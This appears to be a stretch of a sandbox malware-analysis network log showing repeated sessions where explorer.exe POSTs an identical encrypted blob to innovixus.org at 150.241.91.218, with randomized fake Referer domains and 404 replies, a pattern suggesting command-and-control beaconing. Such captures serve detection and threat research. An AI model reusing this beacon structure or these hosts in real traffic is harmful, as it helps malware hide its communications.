                                                                                                                                                              Nov 6, 2024 17:35:48.813013077 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:48 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              63192.168.11.2049817150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:49.012176991 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ssmsevqgihhtaoyy.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:49.012238026 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:49.271545887 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:49 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              64192.168.11.2049818150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:49.473263979 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://yvhomlfhoqfydfne.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:49.473263979 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:49.730284929 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:49 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              65192.168.11.2049819150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:49.930460930 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fwggsalnrkge.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:49.930460930 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:50.187737942 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:50 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              66192.168.11.2049820150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:50.396511078 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pejbwyiwonmysxv.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:50.396511078 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:50.952975988 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:50 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              67192.168.11.2049821150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:51.155286074 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://gkxkibutfasfffh.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:51.155286074 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:51.409683943 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:51 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              68192.168.11.2049822150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:51.611485958 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fpwbfhloavjte.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:51.611485958 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:51.868731022 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:51 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              69192.168.11.2049823150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:52.068309069 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qoreqaowhphp.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:52.068309069 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:52.325407028 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:52 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              70192.168.11.2049824150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:52.530672073 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ghasmkbiogn.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:52.530672073 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:52.791160107 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:52 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              71192.168.11.2049825150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:52.996994019 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://gtvxetubotpecluq.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:52.996994019 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:53.253736019 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:53 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              72192.168.11.2049826150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:53.616652012 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://hjpxnbykxecroxua.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:53.616652012 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:53.873851061 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:53 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              73192.168.11.2049827150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:54.073868990 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://cvcwgwilrkus.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:54.073868990 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:54.328439951 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:54 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              74192.168.11.2049828150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:54.694281101 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://kkybmvpnaxltt.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:54.694282055 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:54.950396061 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:54 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              75192.168.11.2049829150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:55.153430939 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pkokulvkejt.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:55.153430939 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:55.410578966 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:55 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              76192.168.11.2049830150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:55.610763073 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://nrvggiwgilffpy.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:55.610763073 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:55.868541002 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:55 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              77192.168.11.2049831150.241.91.218805064C:\Windows\explorer.exe
